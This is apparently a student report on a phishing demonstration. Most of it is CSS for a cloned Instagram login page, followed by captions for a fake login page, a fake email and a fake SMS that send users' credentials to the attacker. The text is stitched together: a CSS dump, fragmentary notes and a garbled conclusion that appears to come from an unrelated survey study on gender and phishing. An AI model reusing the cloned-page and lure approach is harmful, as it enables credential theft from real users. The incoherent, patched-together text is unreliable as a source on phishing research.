.coreSpritePrivateLock, .coreSpriteProfileCamera, .coreSpriteProfileGrid { background-position: -


180px -281px; }

.coreSpriteProfileCamera, .coreSpriteProfileGrid { background-position: 0px -218px; }

.coreSpriteProfileGrid { background-position: -175px -355px; }

.coreSpriteProfileGridActive, .coreSpriteProfileSave, .coreSpriteProfileSaveActive,


.coreSpriteReload, .coreSpriteRightChevron { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -250px -330px; }

.coreSpriteProfileSave, .coreSpriteProfileSaveActive, .coreSpriteReload, .coreSpriteRightChevron {


background-position: -75px -330px; }

.coreSpriteProfileSaveActive, .coreSpriteReload, .coreSpriteRightChevron { background-position: -


25px -330px; }

.coreSpriteReload, .coreSpriteRightChevron { background-position: -353px -62px; }

.coreSpriteRightChevron { background-position: -353px 0px; }

.coreSpriteRightPaginationArrow, .coreSpriteSaveFull, .coreSpriteSaveLightFull,


.coreSpriteSaveLightOpen { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -303px -134px; }

.coreSpriteSaveFull, .coreSpriteSaveLightFull, .coreSpriteSaveLightOpen { background-position: -


353px -273px; }

.coreSpriteSaveLightFull, .coreSpriteSaveLightOpen { background-position: -353px -248px; }

.coreSpriteSaveLightOpen { background-position: -353px -223px; }

.coreSpriteSaveNull, .coreSpriteSaveOpen, .coreSpriteSaveStory, .coreSpriteSearchClear,


.coreSpriteSearchIcon { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -126px -218px; }

.coreSpriteSaveOpen, .coreSpriteSaveStory, .coreSpriteSearchClear, .coreSpriteSearchIcon


{ background-position: -150px -355px; }

.coreSpriteSaveStory, .coreSpriteSearchClear, .coreSpriteSearchIcon { background-position: -175px -


330px; }

Internal
.coreSpriteSearchClear, .coreSpriteSearchIcon { background-position: -384px -44px; }

.coreSpriteSearchIcon { background-position: -227px -113px; }

.coreSpriteSensitivityIcon, .coreSpriteSensitivityIconSmall, .coreSpriteSpeechBubbleSmall,


.coreSpriteSpinsta { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: 0px -281px; }

.coreSpriteSensitivityIconSmall, .coreSpriteSpeechBubbleSmall, .coreSpriteSpinsta { background-


position: -217px -281px; }

.coreSpriteSpeechBubbleSmall, .coreSpriteSpinsta { background-position: -384px -105px; }

.coreSpriteSpinsta { background-position: -189px -113px; }

.coreSpriteSpinstaNux, .coreSpriteSpinstaStory, .coreSpriteStoriesPost, .coreSpriteStoryCreation,


.coreSpriteStoryCreationAlt { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -312px -281px; }

.coreSpriteSpinstaStory, .coreSpriteStoriesPost, .coreSpriteStoryCreation,


.coreSpriteStoryCreationAlt { background-position: -333px -176px; }

.coreSpriteStoriesPost, .coreSpriteStoryCreation, .coreSpriteStoryCreationAlt { background-


position: -50px -330px; }

.coreSpriteStoryCreation, .coreSpriteStoryCreationAlt { background-position: 0px -330px; }

.coreSpriteStoryCreationAlt { background-position: -384px -125px; }

.coreSpriteStoryViewCount, .coreSpriteUserTagIndicator, .coreSpriteVerifiedBadge,


.coreSpriteVerifiedBadgeSmall { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -202px -113px; }

.coreSpriteUserTagIndicator, .coreSpriteVerifiedBadge, .coreSpriteVerifiedBadgeSmall {


background-position: -260px -134px; }

.coreSpriteVerifiedBadge, .coreSpriteVerifiedBadgeSmall { background-position: -384px -144px; }

.coreSpriteVerifiedBadgeSmall { background-position: -384px -364px; }

.coreSpriteVideoIconLarge, .coreSpriteVideoIconSmall, .coreSpriteVideoNux, .coreSpriteViewCount,


.coreSpriteWindowsStoreButton { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -49px -281px; }

.coreSpriteVideoIconSmall, .coreSpriteVideoNux, .coreSpriteViewCount,


.coreSpriteWindowsStoreButton { background-position: -250px -281px; }

Internal
.coreSpriteVideoNux, .coreSpriteViewCount, .coreSpriteWindowsStoreButton { background-
position: -176px -36px; }

.coreSpriteViewCount, .coreSpriteWindowsStoreButton { background-position: -384px -257px; }

.coreSpriteWindowsStoreButton { background-position: 0px -176px; }

@media (min-width: 736px) {

._c9agk { display: inline-block; }

@media (min-width: 876px) {

._cqw45._2pnef { width: 100%; height: 100px; bottom: 0px; padding-top: 20px; }

._2pnef ._mtajp, ._2pnef ._mtajp ._j7p1u { max-width: none; -moz-box-align: center; align-items:
center; }

._2pnef ._mtajp ._j7p1u { display: flex; -moz-box-orient: horizontal; -moz-box-direction:


normal; flex-direction: row; max-width: 944px; -moz-box-pack: end; justify-content: flex-end;
height: 64px; width: 100%; margin-left: 7px; }

._2pnef ._obnvx { text-align: left; max-width: 376px; margin-right: auto; white-space: normal; }

._2pnef ._1l68d { display: inherit; }

._2pnef ._c9agk { margin-right: 7px; }

._2pnef ._eyfjt { border: medium none; margin: 0px 16px 0px 0px; }

a, abbr, acronym, address, applet, article, aside, audio, b, big, blockquote, body, canvas,
caption, center, cite, code, dd, del, details, dfn, div, dl, dt, em, embed, fieldset, figcaption,
figure, footer, form, h1, h2, h3, h4, h5, h6, header, hgroup, html, i, iframe, img, ins, kbd,
label, legend, li, mark, menu, nav, object, ol, output, p, pre, q, ruby, s, samp, section, small,
span, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, time, tr, tt, u, ul,
var, video { margin: 0px; padding: 0px; border: 0px none; font: inherit; vertical-align:
baseline; }

body { line-height: 1; display:

none;} ol, ul { list-style: outside

none none; }

blockquote::after, blockquote::before, q::after, q::before { content: none; }

#react-root, article, div, footer, header, main, nav, section { -moz-box-align: stretch; align-items:
stretch; border: 0px solid rgb(0, 0, 0); box-sizing: border-box; display: flex; -moz-box-orient: vertical;

Internal
-moz-box-direction: normal; flex-direction: column; flex-shrink: 0; margin: 0px; padding: 0px;
position: relative; }

body { overflow-y: scroll; }

body:-moz-full-screen { height: 100%; width:

100%; } html { }

#react-root, body, html { height: 100%; }

#react-root { z-index: 0; }

body, button, input, textarea { font-family: -apple-


system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif; font-
size: 14px; line-height: 18px; }

a, a:visited { color: rgb(0, 53, 105); text-decoration: none; }

a:active { opacity: 0.5; }

._d2vov { color: rgb(38, 38, 38); font-size: 14px; line-height: 18px; margin: 10px 20px; text-align:
center; }

._fzj6p { -moz-box-orient: horizontal; -moz-box-direction: normal; flex-direction: row; -moz-box-


pack: center; justify-content: center; margin: 10px 0px; }

@media (max-width: 400px) {

._fzj6p { flex-wrap: wrap; }

@media (max-width: 735px) {

._9r5lc { margin: 15px 40px; width: auto; }

._dcj9f::before { color: rgb(255, 255, 255); content: "Г—"; display: block; font-size: 36px; font-
weight: 600; line-height: 36px; padding: 0px; margin: 0px; }

@media (min-width: 481px) {

._o0j5z { padding: 0px 40px; pointer-events: none; transform: translate3d(0px, 0px, 0px); }

._o0j5z::after, ._o0j5z::before { content: ""; display: block; flex-basis: 40px; flex-shrink: 0; }

@media (max-width: 480px) {

._23gmb, ._dcj9f { display: none; }

Internal
}

@media screen and (max-width: 735px) {

._os7n4 { margin: 16px; width: auto; }

@media (max-width: 735px) {

._psmnf { margin-left: 40px; margin-right: 40px; width: auto; }

._o716c { }

._o716c::placeholder { color: rgb(153, 153, 153); font-weight: 300; opacity: 1; }

._ph6vk, ._sjplo { background: rgb(250, 250, 250) none repeat scroll 0% 0%; }

._sjplo { -moz-box-align: center; align-items: center; border-radius: 3px; box-sizing: border-box;


color: rgb(38, 38, 38); display: flex; -moz-box-orient: horizontal; -moz-box-direction: normal;
flex- direction: row; font-size: 14px; position: relative; width: 100%; border: 1px solid rgb(239, 239,
239); }

._ph6vk { border: 0px none; -moz-box-flex: 1; flex: 1 0 0px; outline: medium none; overflow: hidden;
padding: 9px 0px 7px 8px; text-overflow: ellipsis; }

._gaby6 { -moz-box-align: center; align-items: center; -moz-box-flex: 0; flex: 0 0 auto; -moz-


box- orient: horizontal; -moz-box-direction: normal; flex-direction: row; height: 100%; padding-
right: 8px; vertical-align: middle; }

@media (min-width: 736px) {

._ddcu7 { top: 2px; }

._27czg, ._t296e { margin: 0px 40px 6px; }

._t38eb { margin: 8px 40px; }

._3jvtb { display: flex; -moz-box-orient: vertical; -moz-box-direction: normal; flex-direction: column;


display: none;}

._1zdb1 { margin-bottom: 10px; }

._pbd5h, ._pbd5h:active, ._pbd5h:hover, ._pbd5h:visited { font-size: 12px; line-height: 14px; margin-


top: 12px; text-align: center; color: rgb(0, 53, 105); display:block;}

._kbq82 { color: rgb(38, 38, 38); -moz-box-flex: 1; flex-grow: 1; -moz-box-pack: center; justify-
content: center; margin-top: 12px; max-width: 350px; }

._g9ean { color: rgb(38, 38, 38); font-size: 14px; margin: 15px; text-align: center; }

Internal
._g9ean > a, ._g9ean > a:active, ._g9ean > a:hover, ._g9ean > a:visited { color: rgb(56, 151,
240); }

._f9sjj { background-color: rgb(255, 255, 255); border: 1px solid rgb(230, 230, 230); border-
radius: 1px; margin: 0px 0px 10px; padding: 10px 0px; }

._f9sjj:empty { display: none; }

._68swa { margin: 22px auto

12px; } @media (max-width:

450px) {

._kbq82 { -moz-box-pack: justify; justify-content: space-between; margin-top: 0px; max-width:


100%; }

._5lvdj { margin-top: 44px; }

._f9sjj { background-color: transparent; border: medium none; }

._pqycz { color: rgb(0, 53, 105); cursor: pointer; display: inline-block; font-weight: 600; position:
relative; text-transform: uppercase; vertical-align: top; }

._fsoey { cursor: pointer; height: 100%; left: 0px; opacity: 0; position: absolute; top: 0px; width:
100%; }

._sq5zx::before { background-color: rgba(0, 0, 0, 0.098); bottom: -1px; content: ""; height: 1px;
left: 0px; position: absolute; right: 0px; }

._s4mum::before { color: rgb(255, 255, 255); content: "Г—"; display: block; font-size: 22px; font-
weight: 600; line-height: 25px; padding: 0px; margin: 0px; }

._dbnr9::before { color: rgb(153, 153, 153); content: "Г—"; display: block; font-size: 24px; padding:
15px; }

._raoqe:not(:first-child) { margin-right: 16px; }

._g7lf5 { font-size: 12px; font-weight: 600; margin: 0px auto; text-transform: uppercase; width:
100%; }

._1gmap { color: rgb(153, 153, 153); }

._538w0 { display: inline-block; margin-bottom: 7px; margin-right: 16px; }

._538w0:last-child { margin-right: 0px; }

._g8wl6 { -moz-box-flex: 1; flex-grow: 1; margin-bottom: 3px; }

@media (min-width: 876px) {

._8oc6p, ._9z659 { -moz-box-orient: horizontal; -moz-box-direction: normal; flex-flow: row

Internal
wrap; - moz-box-pack: justify; justify-content: space-between; padding: 38px 0px; }

Internal
._8oc6p ._luodr, ._9z659 ._luodr { max-width: 100%; }

._8oc6p ._g8wl6, ._9z659 ._g8wl6 { margin-right: 16px; }

@media (max-width: 875px) {

._8oc6p, ._9z659 { padding: 10px 0px; text-align: center; }

._8oc6p ._g8wl6, ._9z659 ._g8wl6 { -moz-box-pack: center; justify-content: center; margin: 0px
auto; max-width: 360px; }

._8oc6p ._538w0:not(:last-of-type)::after { content: "В·"; margin: 0px 0.25em; }

@media (max-width: 735px) {

._bzgot, ._re7h6 { color: rgb(38, 38, 38); font-weight: 400; }

._bzgot { line-height: 28px; font-size: 26px; }

._re7h6 { font-size: 14px; }

._7djkz { font-size: 14px; color: rgb(94, 177, 255); }

@media (max-width: 413px) {

._bzgot { font-size: 24px; line-height: 27px; }

._pg23k::after { border: 1px solid rgba(0, 0, 0, 0.098); border-radius: 50%; bottom: 0px; content:
""; left: 0px; pointer-events: none; position: absolute; right: 0px; top: 0px; }

@media (min-width: 736px) {

._6g6t5 { font-size: 15px; line-height: 18px; }

@media (max-width: 735px) {

._6g6t5 { font-size: 14px; line-height: 17px; }

._75ljm::after { border-bottom: 1px solid rgb(239, 239, 239); bottom: 0px; content: ""; height: 0px;
left: 58px; position: absolute; right: 12px; }

._e3dda::after { left: 0px; right: 0px; }

Internal
._75ljm:last-child::after { border-bottom: medium none; }

._6rswy::after { content: "."; display: inline-block; visibility: hidden; width: 0px; }

._qlosm._3pzlm::after { bottom: -6px; }

._3pzlm::after { background: rgb(237, 73, 86) none repeat scroll 0% 0%; border-radius: 2px;
bottom:
-10px; content: ""; height: 4px; left: 0px; margin: 0px auto; position: absolute; right: 0px;
transition: bottom 0.2s ease-in-out 0s; width: 4px; }

._9xy3k, ._dv59m::after { content: " "; position: absolute; }

._dv59m::after { border-color: transparent transparent rgb(255, 255, 255); border-style:


solid; border-width: 0px 10px 10px; height: 0px; left: 110px; top: -10px; width: 0px; z-
index: 3; }

._avvq0::placeholder, ._avvq0:focus::placeholder { color: rgb(153, 153, 153); }

._b28md:not(:first-child) { margin-left: 30px; }

@media (max-width: 500px) {

._5ayw3 { display: none; }

._bvwt0, ._qlijk { padding-left: 0px; }

@media (max-width: 768px) {

._giku3 { transform: translate3d(0px, 0px, 0px) scale(0.8); transform-origin: left center 0px; }

._giku3._giku3 { text-indent: 200%; }

._3opco, ._l8p4s { font-size: 14px; }

._kgx47::after { background: rgb(237, 73, 86) none repeat scroll 0% 0%; border-radius: 2px; bottom:
- 5px; content: ""; height: 4px; left: 0px; margin: 0px auto; position: absolute; right: 0px;
transform: translateX(0.5px); width: 4px; }

._4pxed::before { background: rgba(0, 0, 0, 0.098) none repeat scroll 0% 0%; content: ""; height:
1px; left: 0px; position: absolute; right: 0px; top: -1px; }

._b3nzv ._4pxed::before { top: auto; bottom: -1px; }

._c2vev { bottom: 0px; left: 0px; overflow: hidden; position: fixed; right: 0px; z-index: 10; }

._162ov { transform: translateY(0px); transition: transform 0.2s ease-out 0s, -webkit-transform


0.2s ease-out 0s; }

@media (min-width: 736px) {

Internal
._162ov { -moz-box-align: center; align-items: center; }

._3bdnt { border-radius: 2px 2px 0px 0px; min-width: 500px; width: auto; }

._t93vr::before { background-color: rgba(0, 0, 0, 0.098); bottom: -1px; content: ""; height: 1px;
left: 0px; position: absolute; right: 0px; }

._29u45 { min-height: 100%; overflow: hidden; }

._8fi2q { -moz-box-flex: 1; flex-grow: 1; -moz-box-ordinal-group: 5; order: 4; }

._2v79o { background-color: rgb(250, 250, 250); }

._s5vm9 { background-color: rgb(250, 250, 250); -moz-box-ordinal-group: 6; order: 5; padding: 0px


20px; }

._cdujc, ._l8799 { -moz-box-flex: 1; flex-grow: 1; -moz-box-pack: center; justify-content: center;


}

._l8799 { min-height: 100%; overflow: hidden; }

._cdujc { -moz-box-orient: horizontal; -moz-box-direction: normal; flex-direction: row; margin: 0px


auto; max-width: 935px; width: 100%; }

.fb_reset { background: rgba(0, 0, 0, 0) none repeat scroll 0% 0%; border: 0px none; border-
spacing: 0px; color: rgb(0, 0, 0); cursor: auto; direction: ltr; font-family: "lucida
grande",tahoma,verdana,arial,sans-serif; font-size: 11px; font-style: normal; font-variant: normal;
font-weight: normal; letter-spacing: normal; line-height: 1; margin: 0px; overflow: visible;
padding: 0px; text-align: left; text-decoration: none; text-indent: 0px; text-shadow: none;
text-transform: none; visibility: visible; white-space: normal; word-spacing: normal; }

.fb_reset > div { overflow: hidden; }

._fanip {min-height: 160px;}

._7sjyk{margin-top:-18px}

._nwowf{height:18px;margin-left:-9px;margin-top:-9px;width:18px;background-
image:url('loading.png');-webkit-animation:spinner-spin8 .8s steps(8)
infinite;animation:spinner- spin8 .8s steps(8) infinite}

.reg {display: none;}

._anzsd{left:50%;position:absolute;top:50%;background-size:100%}

@-webkit-keyframes spinner-spin8{0%{-webkit-
transform:rotate(180deg);transform:rotate(180deg)}to{-webkit-
transform:rotate(540deg);transform:rotate(540deg)}}@keyframes spinner-spin8{0%{-webkit-
transform:rotate(180deg);transform:rotate(180deg)}to{-webkit-
transform:rotate(540deg);transform:rotate(540deg)}}@-webkit-keyframes spinner-spin12{0%{-

Internal
webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-
transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spinner-spin12{0%{-webkit-
transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-
transform:rotate(360deg);transform:rotate(360deg)}}

Internal
Login

User can login using either of the following options:

1.Sign up page

2.Facebook login

3.Google+

This login will be provided to the Users.

User

User requires the following details to login/create their accounts:

1.User id

2.User name

3.Address

4.Phone

number 5.E-

mail

6. Treatment for What?

Internal
WEB PAGES

FAKE PAGE WE CREATED

REAL INSTAGRAM LOG IN PAGE

Internal
FAKE MAIL WE SEND TO USER

When the user log in their details in this fake link then the user credentials will be save to the
attacker.

This is the phishing attack and the same will be message send to the user by phone

Internal
REAL MESSAGE

FAKE MESSAGE WE SENT TO MOBILE PHONE:

Internal
Conclusion

This final section outlines the key findings, addresses the drawbacks of the analysis and
makes preliminary comments for future research.

The purpose of this study was to identify the various threats to mobile devices and end-user
behavior and perceptions of those threats. We tried to address the extent to which mobile
devices are affected by phishing attacks. Overall, men were perceived to have sufficient
technological know-how of Internet services and facilities operations. Likewise, they have
been found to be so comfortable and confident any time in cyber space, making them more
vulnerable to phone attacks than their female peers.

We also looked at the behavior of users when using online mobile services. The space
transition theory has been given credence, so cyber-victims dissociate their physical profile
from cyber space. The numerous phishing attacks against their mobile devices were also
found to be unconscious or oblivious to users. It has been established that most consumers are
concerned with cyber-attacks whether mildly or not at all.

Finally, the taxonomy of the words ' alluring' and' decoding' used in phishing attacks could be
a useful benchmark for end-users to prevent cyber-victims from becoming. Although the
conclusions from this analysis were empirically deduced, most specimens are handicapped to
generalize the results, however. Obviously, further studies would be appropriate to identify
any vulnerability linkages with mobile operating systems and also to determine if there is any
correlation between mobile network operators and the extent of phishing susceptibility.

Internal

You might also like